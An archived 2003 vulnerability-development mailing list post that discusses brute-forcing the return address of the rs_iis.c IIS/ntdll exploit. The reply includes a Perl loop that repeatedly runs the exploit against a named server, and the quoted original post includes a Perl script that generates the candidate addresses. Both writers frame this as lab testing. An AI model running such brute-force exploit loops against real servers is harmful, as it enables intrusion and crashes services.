Vulnerability Development mailing list archives
RE: Generating Hex Numbers to brute force rs_iis.c
From: "Joshua Wright" <Joshua.Wright () jwu edu>
Date: Wed, 2 Apr 2003 10:17:22 -0500
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I'm no perl expert, but this is what I whipped up for a similar test: $myserver = "pvdnet05"; for ($i = 0; $i < 256; $i++) { $retcode = sprintf("%x", $i); $exec = "./rs_iis $myserver 80 31337 " . $retcode . "04"; system($exec); sleep(1); } Note that the last byte of the RET address is not terribly significant, since the NOP sled is ~65K in size and this value is only max 256 bytes significant. This didn't work well for me, since IIS will sometimes crash without a valid RET address, requiring a server restart. I had meant to look for a way to restart Windows 2000 services from a Linux box with Samba or similar tool, but got bored with it and started trying to exploit something else. :) - -Joshua Wright Senior Network and Security Architect Johnson & Wales University Joshua.Wright () jwu edu http://home.jwu.edu/jwright/ pgpkey: http://home.jwu.edu/jwright/pgpkey.htm fingerprint: FDA5 12FC F391 3740 E0AE BDB6 8FE2 FC0A D44B 4A73
In playing with rs_iis.c (ntdll exploit) in our lab, I've been looking for ways to brute force the return address. I know there's been a shell script (rs_brute.sh) released that already does this, but since I've been playing with PERL lately (and since this shell script did not exist when I began playing with the exploit), I thought I'd take a whack at producing the RET addresses (0x0000-0xffff) in a PERL script. I just wanted to get your input and see if there is and easier way to do this (using PERL, of course). Basically, the goal is as follows: 1) generate Hex Numbers from 0x0000 to 0xffff in the following pattern (0x0000 0x0101 0x0202...0xfdfd 0xfefe 0xffff) 2) pass the output to rs_iis via system() command? So far, I can generate the output and print it to stdout. Any tips on getting the script to run rs_iis once with each address produced by the script? Also, is there a way to produce this output without creating an array like this? #!/usr/bin/perl -w @HexD = ('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f'); for ($i = 0; $i <= 255; $i += 1) { printf("$HexD[int($i / 16)]$HexD[$i % 16]", $i); printf("$HexD[int($i / 16)]$HexD[$i % 16]\n", $i); }
-----BEGIN PGP SIGNATURE----- Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com> iQA/AwUBPor/AY/i/ArUS0pzEQJ75wCeNFPqMa0+AwwuCcYgb7YwRdt98KsAn2HZ Il0dIPyWAX6swPIQfg/LvvQk =hz0W -----END PGP SIGNATURE-----
Current thread:
- Generating Hex Numbers to brute force rs_iis.c Jeremy Junginger (Apr 01)
- Re: Generating Hex Numbers to brute force rs_iis.c Joe Stewart (Apr 03)
- Re: Generating Hex Numbers to brute force rs_iis.c Maarten (Apr 03)
- Re: Generating Hex Numbers to brute force rs_iis.c Blue Boar (Apr 03)
- <Possible follow-ups>
- RE: Generating Hex Numbers to brute force rs_iis.c Joshua Wright (Apr 03)